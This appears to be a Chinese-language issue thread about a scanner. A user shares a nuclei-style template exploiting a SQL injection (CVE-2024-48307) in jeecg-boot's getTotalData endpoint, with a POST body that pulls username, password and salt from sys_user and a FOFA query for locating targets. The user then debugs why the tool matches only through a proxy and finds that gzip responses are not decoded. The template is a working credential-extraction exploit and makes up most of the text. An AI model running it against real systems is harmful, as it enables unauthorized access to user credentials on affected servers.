有一个问题，我不确定是什么原因？

[b0q1]

`id: jeecg-boot-onlDragDatasetHeadgetTotalData-sqli

info:
name: jeecg-boot /drag/onlDragDatasetHead/getTotalData接口SQL注入漏洞
author: nobody
severity: high
reference:
- none
metadata:
fofa-query: body="polyfill_7_2_5.js"
verified: true
tags: jeecg-boot,sqli,CVE-2024-48307

http:

• method: POST
  path:
  • "{{BaseURL}}/jeecg-boot/drag/onlDragDatasetHead/getTotalData"
  • "{{BaseURL}}/jeecgboot/drag/onlDragDatasetHead/getTotalData"
    headers:
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
    Connection: close
    Content-Type: application/json
    body: >
    {
    "tableName": "sys_user",
    "compName": "test",
    "condition": {
    "filter": {}
    },
    "config": {
    "assistValue": [],
    "assistType": [],
    "name": [
    {
    "fieldName": "username,password,salt",
    "fieldType": "string"
    },
    {
    "fieldName": "id",
    "fieldType": "string"
    }
    ],
    "value": [
    {
    "fieldName": "id",
    "fieldType": "string"
    }
    ],
    "type": []
    }
    }
    matchers:
  • type: word
    part: body
    words:
    • 'username'
    • 'password'
    • 'salt'
      condition: and`

就是指定代理才能成功执行，稳定复现
.\shot.exe jeecg-boot-onlDragDatasetHeadgetTotalData-sqli.yaml http://xxxxx
execute finish:
Execution time: 396.9167ms

.\shot.exe -proxy http://127.0.0.1:8080 jeecg-boot-onlDragDatasetHeadgetTotalData-sqli.yaml http://xxxx
Using proxy: http://127.0.0.1:8080
execute finish: &{true false map[] map[] [] map[] map[] map[]}
Execution time: 322.1385ms

nuclei可以扫描出来可不用代理可以扫出来

[b0q1]

我知道了，返回包中使用了gzip，而/neutron@v0.0.1/protocols/http/request.go:中responseToDSLMap（）函數body, _:= ioutil.ReadAll(resp.Body)了，应该判断返回头是否是gzip，然后判断是否需要解码之后再处理。

[b0q1]

中间人服务器应该自动处理了gzip，才会这样